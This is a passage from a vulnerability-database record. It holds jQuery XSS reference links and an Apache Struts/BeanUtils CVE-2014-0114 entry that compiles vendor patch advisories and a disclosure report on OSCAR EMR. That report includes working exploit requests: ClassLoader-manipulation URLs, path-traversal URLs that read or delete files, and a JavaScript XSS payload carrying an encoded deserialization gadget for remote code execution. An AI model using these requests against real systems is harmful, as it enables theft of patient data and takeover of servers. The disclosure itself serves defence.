"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/blaufish/geo"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1047"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-21843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-37603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-21835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1043"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1722"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20676"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1722"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20676"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20677"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4670"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20677"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/glsa/202007-03\u003e"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5\u003e"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org/\u003e."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258."
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14333"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171215",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157850",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159275",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"date": "2020-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"date": "2020-11-04T15:29:15",
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"date": "2023-03-02T15:19:44",
"db": "PACKETSTORM",
"id": "171215",
"ident": null
},
{
"date": "2023-03-02T15:19:19",
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"date": "2020-11-04T15:32:52",
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"date": "2020-07-27T17:38:33",
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"date": "2020-05-28T16:07:33",
"db": "PACKETSTORM",
"id": "157850",
"ident": null
},
{
"date": "2020-09-24T00:30:36",
"db": "PACKETSTORM",
"id": "159275",
"ident": null
},
{
"date": "2020-05-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"date": "2020-04-29T22:15:11.903000",
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-07-25T00:00:00",
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"date": "2025-07-03T06:01:00",
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"date": "2024-11-21T04:56:36.110000",
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "jQuery\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code execution, xss, memory leak",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "159876"
}
],
"trust": 0.2
}
}
VAR-201404-0288
Vulnerability from variot - Updated: 2026-03-09 21:53Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. An information management system for hospitals that can manage data such as financial management, clinical practice, and pharmacies. OpenClinic GA There are multiple vulnerabilities in. OpenClinic GA The following vulnerabilities exist in. * Avoid authentication via another path or channel (CWE-288) - CVE-2020-14485 Inappropriate restriction of excessive authentication attempts (CWE-307) - CVE-2020-14484 Improper authentication (CWE-287) - CVE-2020-14494 Lack of certification (CWE-862) - CVE-2020-14491 Execution with unnecessary privileges (CWE-250) - CVE-2020-14493 Unlimited upload of dangerous types of files (CWE-434) - CVE-2020-14488 Path traversal (CWE-22) - CVE-2020-14490 Inappropriate authorization process (CWE-285) - CVE-2020-14486 Cross-site scripting (CWE-79) - CVE-2020-14492 Use of unmaintained third-party products (CWE-1104) - CVE-2020-14495 , CVE-2016-1181 , CVE-2016-1182 Due to * Inadequate protection of credentials (CWE-522) - CVE-2020-14489 Hidden features (CWE-912) - CVE-2020-14487 * However, this vulnerability is Version 5.89.05b Does not affectThe expected impact depends on each vulnerability, but it may be affected as follows. * A remote attacker initiates a session by bypassing client-side access control or sending a specially crafted request. SQL Performs administrator functions such as query execution - CVE-2020-14485 A remote attacker bypasses the system's account lock feature and brute force attacks ( Brute force attack ) Is executed - CVE-2020-14484 In this system, brute force attack ( Brute force attack ) Insufficient protection mechanism allows an unauthenticated attacker to access the system with more than the maximum number of attempts. - CVE-2020-14494 The system SQL Since it does not check the execution permission of the query, a user with lower permission can access information that requires higher permission. - CVE-2020-14491 In this system, with relatively low authority SQL It is possible to write any file by executing, and as a result, any command is executed on the system. - CVE-2020-14493 The system does not properly validate uploaded files, so a low-privileged attacker uploads and executes arbitrary files on the system. - CVE-2020-14488 Executing a file that contains any local file specified by a parameter exposes sensitive information or executes an uploaded malicious file. - CVE-2020-14490 By avoiding the redirect process that is executed when authentication fails, an unauthenticated attacker can execute a command illegally. - CVE-2020-14486 Malicious code is executed on the user's browser because the user's input value is not properly validated. - CVE-2020-14492 Known vulnerabilities in end-of-support third-party software used by the system (CVE-2014-0114 , CVE-2016-1181 , CVE-2016-1182) Malicious code executed by a remote attacker due to * There is a flaw in the hashing process when saving the password, and the password is stolen by a dictionary attack. - CVE-2020-14489 A user account set by default exists in the system in an accessible state, and an attacker can use that account to execute arbitrary commands. - CVE-2020-14487. TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated (CVE-2014-0114). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.On a server where the product in running, a remote attacker may steal information or execute arbitrary code. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html
Updated Packages:
Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell
Product Description:
"OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System."
Timeline:
29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed
Contents:
This report uses OVE identifiers: http://www.openwall.com/ove/
OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery
Issue details:
=== OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency ===
OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114.
An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster
Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz
An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid
=== OVE-20160329-0003: Remote code execution via unsafe object deserialization ===
TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial.
In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well.
=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface ===
logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003:
var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData);
XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested)
=== OVE-20160329-0007: SQL injection ===
On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators.
=== OVE-20160329-0008: Path traversal ===
ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename).
Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz
An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp
=== OVE-20160329-0002: Insecure direct object reference in document manager ===
ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private.
=== OVE-20160329-0005: Denial of service via resource exhaustion ===
uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition).
=== OVE-20160329-0006: Insecure password storage ===
Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack.
=== OVE-20160329-0009: Cross-site request forgery ===
The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: struts security update Advisory ID: RHSA-2014:0474-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0474.html Issue date: 2014-05-07 CVE Names: CVE-2014-0114 =====================================================================
- Summary:
Updated struts packages that fix one security issue are now available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
- This could lead to remote code execution under certain conditions. (CVE-2014-0114)
All struts users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using struts must be restarted for this update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters
- Package List:
RHEL Desktop Workstation (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm
i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm
x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm
i386: struts-1.2.9-4jpp.8.el5_10.i386.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm struts-manual-1.2.9-4jpp.8.el5_10.i386.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm
ia64: struts-1.2.9-4jpp.8.el5_10.ia64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ia64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ia64.rpm struts-manual-1.2.9-4jpp.8.el5_10.ia64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ia64.rpm
ppc: struts-1.2.9-4jpp.8.el5_10.ppc.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.ppc.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.ppc.rpm struts-manual-1.2.9-4jpp.8.el5_10.ppc.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ppc.rpm
s390x: struts-1.2.9-4jpp.8.el5_10.s390x.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.s390x.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.s390x.rpm struts-manual-1.2.9-4jpp.8.el5_10.s390x.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.s390x.rpm
x86_64: struts-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-0114.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTacDGXlSAg2UNWIIRAhvbAJ0Za5jRat54AcgbIdHKlzbZN1y1hACcC8DR HJqJt2S278nXdfwLyGc7EJQ= =qMuX -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201607-09
https://security.gentoo.org/
Severity: Normal Title: Commons-BeanUtils: Arbitrary code execution Date: July 20, 2016 Bugs: #534498 ID: 201607-09
Synopsis
Apache Commons BeanUtils does not properly suppress the class property, which could lead to the remote execution of arbitrary code.
Workaround
There is no known workaround at this time.
